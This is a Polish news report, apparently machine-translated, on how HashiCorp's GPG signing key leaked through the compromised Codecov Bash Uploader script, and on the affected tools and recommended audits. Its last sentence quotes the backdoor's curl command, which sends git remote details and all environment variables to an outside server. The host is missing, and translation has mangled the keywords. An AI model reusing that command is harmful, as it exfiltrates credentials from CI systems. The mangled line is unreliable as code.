HashiCorp, znana z rozwoju narzędzi open source Vagrant, Packer, Nomad i Terraform, ogłosiła wyciek prywatnego klucza GPG używanego do tworzenia podpisów cyfrowych weryfikujących wydania. Osoby atakujące, które uzyskały dostęp do klucza GPG, mogą potencjalnie wprowadzić ukryte zmiany w produktach HashiCorp, weryfikując je za pomocą prawidłowego podpisu cyfrowego. Jednocześnie spółka stwierdziła, że w trakcie audytu nie natrafiono na ślady prób dokonania takich modyfikacji.
Obecnie skompromitowany klucz GPG został unieważniony i w jego miejsce wprowadzono nowy klucz. Problem dotyczył jedynie weryfikacji przy użyciu plików SHA256SUM i SHA256SUM.sig i nie wpływał na generowanie podpisów cyfrowych dla pakietów Linux DEB i RPM dostarczanych przez releases.hashicorp.com, a także mechanizmów weryfikacji wersji dla macOS i Windows (AuthentiCode) .
Do wycieku doszło na skutek wykorzystania w infrastrukturze skryptu Codecov Bash Uploader (codecov-bash), służącego do pobierania raportów zasięgu z systemów ciągłej integracji. Podczas ataku na firmę Codecov we wskazanym skrypcie ukryto backdoora, za pośrednictwem którego hasła i klucze szyfrujące były przesyłane na serwer atakujących.
W celu włamania się napastnicy wykorzystali błąd w procesie tworzenia obrazu Codecov Docker, który pozwolił im wyodrębnić dane dostępowe do GCS (Google Cloud Storage), niezbędne do wprowadzenia zmian w skrypcie Bash Uploader dystrybuowanym z codecov.io strona internetowa. Zmiany wprowadzono 31 stycznia, pozostały niewykryte przez dwa miesiące i umożliwiły atakującym wydobycie informacji przechowywanych w środowiskach systemów ciągłej integracji klientów. Wykorzystując dodany złośliwy kod, osoby atakujące mogły uzyskać informacje o testowanym repozytorium Git oraz wszystkich zmiennych środowiskowych, w tym tokenach, kluczach szyfrujących i hasłach przesyłanych do systemów ciągłej integracji w celu organizacji dostępu do kodu aplikacji, repozytoriów i usług takich jak Amazon Web Services i GitHub.
Oprócz bezpośredniego wywołania skrypt Codecov Bash Uploader został wykorzystany w ramach innych programów przesyłających, takich jak Codecov-action (Github), Codecov-circleci-orb i Codecov-bitrise-step, których użytkowników również dotyczy problem. Wszystkim użytkownikom codecov-bash i produktów pokrewnych zaleca się przeprowadzenie audytu swojej infrastruktury, a także zmianę haseł i kluczy szyfrujących. Możesz sprawdzić obecność backdoora w skrypcie poprzez obecność linii curl -sm 0.5 -d „$(git Remote -v)<<<<<< ENV $(env)” http:// /prześlij/v2 || PRAWDA
Źródło: opennet.ru